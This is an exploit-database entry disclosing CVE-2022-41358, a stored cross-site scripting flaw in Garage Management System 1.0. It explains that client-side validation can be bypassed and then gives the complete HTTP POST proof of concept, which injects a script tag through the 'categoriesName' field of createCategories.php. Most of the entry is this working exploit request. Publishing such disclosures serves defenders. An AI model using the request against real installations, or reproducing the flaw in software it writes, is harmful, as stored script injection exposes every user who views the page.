Exploit for Garage Management System 1.0 Cross Site Scripting CVE-2022-41358

## https://sploitus.com/exploit?id=PACKETSTORM:168718
# Exploit Title: Garage Management System 1.0 - 'categoriesName' - Stored  
XSS  
# Date: 18-09-2022  
# Exploit Author: Sam Wallace  
# Software Link:  
https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html  
# Version: 1.0  
# Tested on: Debian  
# CVE : CVE-2022-41358  
  
Summary:  
Garage Management System utilizes client side validation to prevent XSS.  
Using burp, a request can be modified and replayed to the server bypassing  
this validation which creates an avenue for XSS.  
  
Parameter: categoriesName  
URI: /garage/php_action/createCategories.php  
  
POC:  
POST /garage/php_action/createCategories.php HTTP/1.1  
Host: 10.24.0.69  
Content-Length: 367  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://10.24.0.69  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryqKDsN4gmatTEEkhS  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://10.24.0.69/garage/add-category.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=gbklvcv3vvv987636urv0gg53u  
Connection: close  
  
------WebKitFormBoundaryqKDsN4gmatTEEkhS  
Content-Disposition: form-data; name="categoriesName"  
  
<script>alert(1)</script>  
------WebKitFormBoundaryqKDsN4gmatTEEkhS  
Content-Disposition: form-data; name="categoriesStatus"  
  
1  
------WebKitFormBoundaryqKDsN4gmatTEEkhS  
Content-Disposition: form-data; name="create"  
  
  
------WebKitFormBoundaryqKDsN4gmatTEEkhS--